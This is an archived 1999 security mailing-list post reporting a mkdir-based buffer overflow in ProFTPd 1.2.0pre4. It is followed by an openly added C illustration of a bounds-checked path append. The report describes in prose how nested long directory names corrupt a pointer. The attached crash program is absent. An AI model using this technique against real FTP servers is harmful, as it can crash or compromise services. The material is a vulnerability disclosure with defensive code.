[linux-security] buffer overflow in proftpd-1.2.0pre4,

From: Jan-Philip Velders (jpvat_private)
Date: Sun Sep 05 1999 - 04:45:56 PDT

    
    ---1463810815-1223308169-936489982=:15281
    Content-Type: TEXT/PLAIN; CHARSET=US-ASCII
    Content-ID: <Pine.LNX.4.10.9909050208003.15329at_private>
    
    ---------- Forwarded message ----------
    Date: Sun, 05 Sep 1999 02:08:29 +0200 (CEST)
    From: Renaud Deraison <deraisonat_private>
    To: linux-securityat_private
    Subject: [linux-security] buffer overflow in proftpd-1.2.0pre4,
         supposed to be 'safe'
    Resent-Date: Sun, 05 Sep 1999 06:16:54 +0000
    Resent-From: linux-securityat_private
    Resent-cc: recipient list not shown: ;
    
    
    
    
    Hello,
    
    ProFTPd, an FTP server, has been suffering from several security holes lately.
    
    However, version 1.2.0pre4 is still vulnerable to a mkdir attack,
    even though it is supposed to be patched against it.
    
    The trick is to create directories whose names don't exceed 255 chars.
    
    I have not looked at this problem in detail, but I could at least make a
    pointer point to a bogus location (85858585) using this method.
    
    Attached to this mail is a C program that will make proftpd crash, but
    which won't exploit the vulnerability.
    
    
    Thank you for your attention,
    
    				-- Renaud
    --
    Renaud Deraison
    The Nessus Project
    http://www.nessus.org
    
    
    ---1463810815-1223308169-936489982=:15281
    Content-Type: TEXT/PLAIN; CHARSET=US-ASCII; NAME="crash_ftpd.c"
    Content-Transfer-Encoding: BASE64
    Content-ID: <Pine.LNX.4.10.9909050206220.15281at_private>
    Content-Description: demo code
    Content-Disposition: ATTACHMENT; FILENAME="crash_ftpd.c"
    
    ---1463810815-1223308169-936489982=:15281--
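
The message above does not identify the root cause. The following is an added illustration, not ProFTPD code and not part of the original message: it assumes the failure class is a server that validates each directory name against the 255-character limit but not the accumulated path, and shows a path append that checks the total length. `PATH_CAP`, the function names, and the 254-character, 40-round sample input are assumptions constructed for the example.

```c
#include <stdio.h>
#include <string.h>

#define NAME_LIMIT 255   /* per-name limit mentioned in the message */
#define PATH_CAP   1024  /* assumed size of the buffer holding the path */

/* Per-component check only: a 254-char name passes this every time. */
static int component_ok(const char *name)
{
    size_t n = strlen(name);
    return n > 0 && n <= NAME_LIMIT && strchr(name, '/') == NULL;
}

/* Append "/name" to cwd only if the whole result plus NUL fits in cap
 * bytes. Returns 0 on success, -1 if rejected (cwd is left unchanged). */
static int path_push(char *cwd, size_t cap, const char *name)
{
    size_t cur, add;
    if (!component_ok(name)) return -1;
    cur = strlen(cwd);
    add = strlen(name) + 1;                 /* '/' plus the name */
    if (cur >= cap || add > cap - cur - 1) return -1;
    cwd[cur] = '/';
    memcpy(cwd + cur + 1, name, add - 1);
    cwd[cur + add] = '\0';
    return 0;
}

/* Nest `rounds` directories named with `len` X's; return how many fit. */
static int simulate_nesting(size_t len, int rounds)
{
    char cwd[PATH_CAP] = "";
    char name[NAME_LIMIT + 1];
    int i, accepted = 0;
    if (len > NAME_LIMIT) return -1;
    memset(name, 'X', len);
    name[len] = '\0';
    for (i = 0; i < rounds; i++) {
        if (path_push(cwd, sizeof cwd, name) != 0) break;
        accepted++;
    }
    return accepted;
}

int main(void)
{
    printf("accepted levels: %d\n", simulate_nesting(254, 40));
    return 0;
}
```

Every name in the constructed input passes `component_ok`, so only the total-length test in `path_push` stops the path from outgrowing its buffer.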
    



    This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 15:02:02 PDT